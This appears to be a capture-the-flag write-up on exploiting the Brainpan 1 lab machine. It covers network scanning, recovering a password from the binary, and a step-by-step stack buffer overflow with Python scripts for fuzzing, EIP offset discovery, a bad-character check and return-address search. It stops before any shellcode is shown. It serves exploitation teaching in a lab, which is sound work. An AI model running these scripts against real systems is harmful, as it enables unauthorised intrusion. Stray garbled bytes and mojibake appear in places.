I"é˜<p>This is a machine created by <strong>superkojiman</strong>, it is an interesting box and a great start point for those who are beginning to learn binary exploitation.</p>

<h2 id="information-gathering">Information Gathering</h2>
<h3 id="host-discovery">Host Discovery</h3>

<p>I performed an ARP scan to discover the target machine on the local network.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>arp-scan <span class="nt">-I</span> vmnet1 192.168.179.1/24 
Interface: vmnet1, <span class="nb">type</span>: EN10MB, MAC: 00:50:56:c0:00:01, IPv4: 192.168.179.1
WARNING: host part of 192.168.179.1/24 is non-zero
Starting arp-scan 1.9.7 with 256 hosts <span class="o">(</span>https://github.com/royhills/arp-scan<span class="o">)</span>
192.168.179.159 00:0c:29:76:be:a5       VMware, Inc.
192.168.179.254 00:50:56:f6:66:ae       VMware, Inc.
</code></pre></div></div>

<h3 id="port-scanning">Port Scanning</h3>

<p>The full TCP port scan revealed two open ports.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>nmap <span class="nt">-T4</span> <span class="nt">-n</span> <span class="nt">-v</span> <span class="nt">-p-</span> 192.168.179.159 <span class="nt">-oG</span> nmap/all-tcp-ports.txt
...
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt
</code></pre></div></div>

<h3 id="service-enumeration">Service Enumeration</h3>

<p>Then I performed the service enumeration of open ports, OS detection, script scanning and traceroute agains the target.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>nmap <span class="nt">-A</span> <span class="nt">-n</span> <span class="nt">-v</span> <span class="nt">-p9999</span>,10000 192.168.179.159 <span class="nt">-oN</span> nmap/service-enum.txt
...
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings:
|   NULL:
|     _| _|
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     <span class="o">[</span>________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 <span class="o">(</span>Python 2.7.3<span class="o">)</span>
|_http-title: Site doesn<span class="s1">'t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.91%I=7%D=10/31%Time=617EACA4%P=x86_64-pc-linux-gnu%r(N
SF:ULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\
SF:|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20
SF:\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\
SF:x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\
SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\
SF:x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\
SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\
SF:x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\
SF:x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\
SF:x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\
SF:x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20&gt;&gt;\x20");
</span></code></pre></div></div>

<h3 id="enumeration-on-port-10000">Enumeration on port 10000</h3>

<p>The web service running on this port doesn‚Äôt reveal much, so I decided run gobuster to discover hidden web content.</p>

<p><img src="/assets/images/brainpan/screenshot-1.png" alt="" /></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://192.168.179.159:10000/ <span class="nt">-w</span> /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt <span class="nt">-e</span>
...
http://192.168.179.159:10000/bin                  <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 0] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> /bin/]
</code></pre></div></div>

<p>The bin directory was discovered, so I access it and found a windows executable file.</p>

<p><img src="/assets/images/brainpan/screenshot-2.png" alt="" /></p>

<p>I downloaded the exe file to the attacking machine, examining it with the strings tool I found a possible password.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>wget http://192.168.179.159:10000/bin/brainpan.exe

root@kali:~/brainpan1<span class="nv">$ </span>file brainpan.exe 
brainpan.exe: PE32 executable <span class="o">(</span>console<span class="o">)</span> Intel 80386 <span class="o">(</span>stripped to external PDB<span class="o">)</span>, <span class="k">for </span>MS Windows

root@kali:~/brainpan1<span class="nv">$ </span>strings brainpan.exe | <span class="nb">sed</span> <span class="nt">-n</span> <span class="s1">'19p'</span>
shitstorm
</code></pre></div></div>

<p>I ran the executable file on a windows machine, this is waiting for incoming connections on port 9999.</p>

<p><img src="/assets/images/brainpan/screenshot-3.png" alt="" /></p>

<p>I connected on that service, entered the password and was greeted with an access granted but nothing else.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>nc 192.168.38.131 9999    
_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

<span class="o">[</span>________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                              

                          <span class="o">&gt;&gt;</span> shitstorm
                          ACCESS GRANTED
</code></pre></div></div>

<p>On the windows machine we can see that the exe file that is running copied the password that I entered and shows its length, this executable is the same one that runs on port 9999 on the target machine.</p>

<p><img src="/assets/images/brainpan/screenshot-4.png" alt="" /></p>

<h3 id="debugging-the-excutable-file">Debugging the excutable file</h3>

<p>On my test windows machine I will use Immunity Debugger, to start debugging we need to attach our executable file, to this we click on <strong>File-&gt;Open</strong> and select the brainpan.exe application, then we click on the play button, this prcess most be carried out every time a crash occurs.</p>

<p><img src="/assets/images/brainpan/screenshot-5.png" alt="" /></p>

<p>I developed a python script that will send 100 ‚ÄòA‚Äô characters first, then increase to 200 characters and so on, this is done in order to cause a crash in the application.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/usr/bin/env python3</span>

import socket
import <span class="nb">time
</span>import sys

<span class="nv">host</span><span class="o">=</span><span class="s2">"192.168.38.131"</span>
<span class="nv">port</span><span class="o">=</span>9999

<span class="nv">buffer</span><span class="o">=</span><span class="s2">"A"</span><span class="k">*</span>100

<span class="k">while </span>True:
    try:
        <span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET,socket.SOCK_STREAM<span class="o">)</span>
        s.settimeout<span class="o">(</span>10<span class="o">)</span>
        s.connect<span class="o">((</span>host,port<span class="o">))</span>
        s.send<span class="o">(</span>f<span class="s2">"{buffer} </span><span class="se">\n\r</span><span class="s2">"</span>.encode<span class="o">(</span><span class="s2">"latin-1"</span><span class="o">))</span>
        s.recv<span class="o">(</span>1024<span class="o">)</span>
        print<span class="o">(</span>f<span class="s2">"Sending {len(buffer)} bytes"</span><span class="o">)</span>
        time.sleep<span class="o">(</span>1<span class="o">)</span>
        <span class="nv">buffer</span><span class="o">=</span>buffer+<span class="o">(</span><span class="s2">"A"</span><span class="k">*</span>200<span class="o">)</span>
    except:
        print<span class="o">(</span>f<span class="s2">"Crash occurred at {len(buffer)-200} bytes"</span><span class="o">)</span>
        sys.exit<span class="o">(</span>0<span class="o">)</span>
</code></pre></div></div>

<p>Running the script we see that the connection stopped at 700 bytes, this means that an application failure occurred.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>python3 fuzzer.py 
Sending 100 bytes
Sending 300 bytes
Sending 500 bytes
Sending 700 bytes
Crash occurred at 700 bytes
</code></pre></div></div>

<p>As we can see in the following screenshot the EIP register was overwritten with our buffer of A‚Äôs (the hex equivalent of the letter A is \x41).</p>

<p><img src="/assets/images/brainpan/screenshot-6.png" alt="" /></p>

<h3 id="replicating-the-crash">Replicating the crash</h3>

<p>Now we know that the crash was triggered about 700 characters, we can replicate it without running the fuzzer again.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">host</span><span class="o">=</span><span class="s">"192.168.38.131"</span>
<span class="n">port</span><span class="o">=</span><span class="mi">9999</span>

<span class="nb">buffer</span><span class="o">=</span><span class="s">"</span><span class="se">\x41</span><span class="s">"</span><span class="o">*</span><span class="mi">700</span>

<span class="k">try</span><span class="p">:</span>
    <span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">))</span>
    <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Sending buffer.."</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="s">f"</span><span class="si">{</span><span class="nb">buffer</span><span class="si">}</span><span class="s"> </span><span class="se">\n\r</span><span class="s">"</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">"latin-1"</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Done."</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Couldn't connect with the server"</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="finding-the-offset-to-the-eip-register">Finding the offset to the EIP Register</h3>

<p>To locate the offset to the EIP register, we can use the ruby utility msf-pattern_create, this tool will create a unique string that will allow us to easily identify the four bytes of the EIP register, in this case we need to generate a 700 bytes buffer.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>msf-pattern_create <span class="nt">-l</span> 700
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A
</code></pre></div></div>

<p>We replace the A‚Äôs with the previously created string, and run the script.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">host</span><span class="o">=</span><span class="s">"192.168.38.131"</span>
<span class="n">port</span><span class="o">=</span><span class="mi">9999</span>

<span class="nb">buffer</span><span class="o">=</span><span class="s">"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A"</span>

<span class="k">try</span><span class="p">:</span>
    <span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">))</span>
    <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Sending buffer.."</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="s">f"</span><span class="si">{</span><span class="nb">buffer</span><span class="si">}</span><span class="s"> </span><span class="se">\n\r</span><span class="s">"</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">"latin-1"</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Done."</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Couldn't connect with the server"</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>python3 poc2.py
Sending buffer..
Done.
</code></pre></div></div>

<p>As we can see, the EIP resister was overwritten with the string <strong>35724134</strong>.</p>

<p><img src="/assets/images/brainpan/screenshot-7.png" alt="" /></p>

<p>Then with the help of msf-pattern_offset we locate the offset to the EIP register.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>msf-pattern_offset <span class="nt">-l</span> 700 <span class="nt">-q</span> 35724134
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Exact match at offset 524
</code></pre></div></div>
<h3 id="controlling-the-eip-register">Controlling the EIP Register</h3>

<p>Now, we include in the buffer variable 524 A‚Äôs then 4 B‚Äôs and 500 C‚Äôs.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">host</span><span class="o">=</span><span class="s">"192.168.38.131"</span>
<span class="n">port</span><span class="o">=</span><span class="mi">9999</span>

<span class="nb">buffer</span><span class="o">=</span><span class="s">"</span><span class="se">\x41</span><span class="s">"</span><span class="o">*</span><span class="mi">524</span> <span class="o">+</span> <span class="s">"</span><span class="se">\x42</span><span class="s">"</span><span class="o">*</span><span class="mi">4</span> <span class="o">+</span> <span class="s">"</span><span class="se">\x43</span><span class="s">"</span><span class="o">*</span><span class="mi">500</span>

<span class="k">try</span><span class="p">:</span>
    <span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">))</span>
    <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Sending buffer.."</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="s">f"</span><span class="si">{</span><span class="nb">buffer</span><span class="si">}</span><span class="s"> </span><span class="se">\n\r</span><span class="s">"</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">"latin-1"</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Done."</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Couldn't connect with the server"</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<p>We run the script, and in the screenshot we can see that the EIP register was successfully overwritten with B‚Äôs (its equivalent in hexadecimal is \x42), if we notice then I added 500 C‚Äôs to test if there is the necessary size for the shellcode.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>python3 poc3.py
Sending buffer..
Done.
</code></pre></div></div>

<p><img src="/assets/images/brainpan/screenshot-8.png" alt="" /></p>

<h3 id="checking-for-bad-characters">Checking for bad characters</h3>

<p>Now we have control of the EIP register, it is time to check for bad characters, this procedure is important so that our shellcode can execute correctly, you can find the badchars list <a href="https://github.com/mrinalpande/scripts/blob/master/python/badchars">here</a>.</p>

<p>A common bad character known as null byte (\x00) was skipped in the buffer of badchars, this is wrong because it is used to terminate a string and could truncate the execution of the shellcode.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">sys</span>

<span class="n">host</span><span class="o">=</span><span class="s">"192.168.38.131"</span>
<span class="n">port</span><span class="o">=</span><span class="mi">9999</span>

<span class="n">badchars</span><span class="o">=</span><span class="p">(</span>
        <span class="s">"</span><span class="se">\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0</span><span class="s">"</span>
        <span class="s">"</span><span class="se">\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff</span><span class="s">"</span><span class="p">)</span>

<span class="nb">buffer</span><span class="o">=</span><span class="s">"</span><span class="se">\x41</span><span class="s">"</span><span class="o">*</span><span class="mi">524</span> <span class="o">+</span> <span class="s">"</span><span class="se">\x42</span><span class="s">"</span><span class="o">*</span><span class="mi">4</span> <span class="o">+</span> <span class="n">badchars</span>

<span class="k">try</span><span class="p">:</span>
    <span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">))</span>
    <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Sending buffer.."</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="s">f"</span><span class="si">{</span><span class="nb">buffer</span><span class="si">}</span><span class="s"> </span><span class="se">\n\r</span><span class="s">"</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">"latin-1"</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Done."</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Couldn't connect with the server"</span><span class="p">)</span>
    <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<p>After to run the script no bad characters were found, except for the null byte.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>python3 poc4.py
Sending buffer..
Done.
</code></pre></div></div>

<p><img src="/assets/images/brainpan/screenshot-9.png" alt="" /></p>

<h3 id="finding-a-return-address">Finding a return address</h3>

<p>The next step is to find a way to redirect the execution flow to the shellcode located at the ESP register, to this we can use the script mona.py, you can download it <a href="The next step is find a way to redirect the execution flow to the shellcode located at the ESP register">here</a>, that will help us to identify modules in memory, such as a return address, which in our case is a JMP ESP.</p>

<p>I entered the following command within Immunity Debugger.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">!</span>mona modules
</code></pre></div></div>

<p><img src="/assets/images/brainpan/screenshot-10.png" alt="" /></p>

<p>In the results we can see a list of several modules, but one catches my attention is brainpan.exe, this one doesn‚Äôt have memory protection, so I will use it.</p>

<p>Then we need to find the instruction equivalent to JMP ESP, to this I used the ruby utility msf-nasm_shell.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/brainpan1<span class="nv">$ </span>msf-nasm_shell 
nasm <span class="o">&gt;</span> jmp esp
00000000  FFE4              jmp esp
</code></pre></div></div>

<p>To find the address JMP ESP, I used the following instruction within Immunity Debugger.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">!</span>mona find <span class="nt">-s</span> ‚Äú<span class="se">\x</span>FF<span class="se">\x</span>E4‚Äù <span class="nt">-m</span> brainpan.exe
</code></pre></div></div>

<p><img src="/assets/images/brainpan/screenshot-11.png" alt="" /></p>

<p>We can even verify that the address belongs to the JMP ESP instruction.</p>

<p><img src="/assets/images/brainpan/screenshot-12.png" alt="" /></p>

<h3 id="executing-the-shellcode">Executing the shellcode</h3>

<p>We generate a windows shellcode.</p>

